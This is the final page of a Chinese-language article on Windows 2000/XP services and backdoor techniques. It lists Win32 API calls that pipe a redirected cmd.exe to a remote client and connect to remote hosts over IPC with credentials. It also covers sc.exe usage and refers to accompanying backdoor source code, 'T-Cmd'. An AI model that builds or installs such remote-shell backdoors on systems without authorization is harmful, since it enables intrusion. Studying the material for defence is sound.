WEB开发网
开发学院软件开发VC 浅析Windows2000/XP服务与后门技术 阅读

浅析Windows2000/XP服务与后门技术

 2010-05-12 20:35:40 来源:WEB开发网   
核心提示:3.后门程序相关函数hMutex=CreateMutex(NULL,FALSE,NULL);//创建互斥量;hThread=CreateThread(NULL,0,CmdShell,(LPVOID)&sClient,0,NULL);//创建处理客户端访问的重定向输入输出线程;CreatePipe(&hReadPipe,

3.后门程序相关函数

hMutex=CreateMutex(NULL,FALSE,NULL);
  //创建互斥量;
  hThread=CreateThread(NULL,0,CmdShell,(LPVOID)&sClient,0,NULL);
  //创建处理客户端访问的重定向输入输出线程;
  CreatePipe(&hReadPipe,&hReadShell,&saPipe,0);
  CreatePipe(&hWriteShell,&hWritePipe,&saPipe,0);
  //创建用于进程间通信的输入/输出管道;
  CreateProcess(lpImagePath,NULL,NULL,NULL,TRUE,0,NULL,NULL,&lpStartupInfo,&lpProcessInfo);
  //创建经重定向输入输出的Cmd进程;
  hThread[1]=CreateThread(NULL,0,ReadShell,(LPVOID*)&sdRead,0,&dwSendThreadId);
  hThread[2]=CreateThread(NULL,0,WriteShell,(LPVOID *)&sdWrite,0,&dwReavThreadId);
  //创建处理Cmd输入输出的线程;
  dwResult=WaitForMultipleObjects(3,hThread,FALSE,INFINITE);
  //等待线程或进程的结束;
  ReleaseMutex(hMutex);
  //释放互斥量;
  PeekNamedPipe(sdRead.hPipe,szBuffer,BUFFER_SIZE,&dwBufferRead,NULL,NULL);
  //从管道中复制数据到缓冲区中,但不从管道中移出;
  ReadFile(sdRead.hPipe,szBuffer,BUFFER_SIZE,&dwBufferRead,NULL);
  //从管道中复制数据到缓冲区中;
  WriteFile(sdWrite.hPipe,szBuffer2Write,dwBuffer2Write,&dwBufferWritten,NULL);
  //向管道中写入从客户端接收到的数据;
  dwErrorCode=WNetAddConnection2(&NetResource,lpPassword,lpUserName,CONNECT_INTERACTIVE);
  //与远程主机建立连接;
  WNetCancelConnection2(lpIPC,CONNECT_UPDATE_PROFILE,TRUE);
  //与远程主机结束连接;

六、附录

1.SC简介

SC是一个与NT服务控制器,服务进程进行通信的控制台程序,它可以查询和修改已安装服务的数据库。

语法:sc <server> [command] [service name] <option1> <option2>... ,选项<server>为“\\ServerName”的形式。

主要的命令包括:query,config,qc,delete,create,GetDisplayName,GetKeyName,EnumDepend等。

2.T-Cmd v1.0 源代码

请见本文提供的配套示例源代码

关于:

FZ5FZ,我们主要从事网络/系统安全的学习与研究,深入编程技术的剖析与探讨,坚持原创,追求共享。

本文配套源码

上一页  1 2 3 4 

Tags:浅析 Windows XP

编辑录入:爽爽 [复制链接] [打 印]
赞助商链接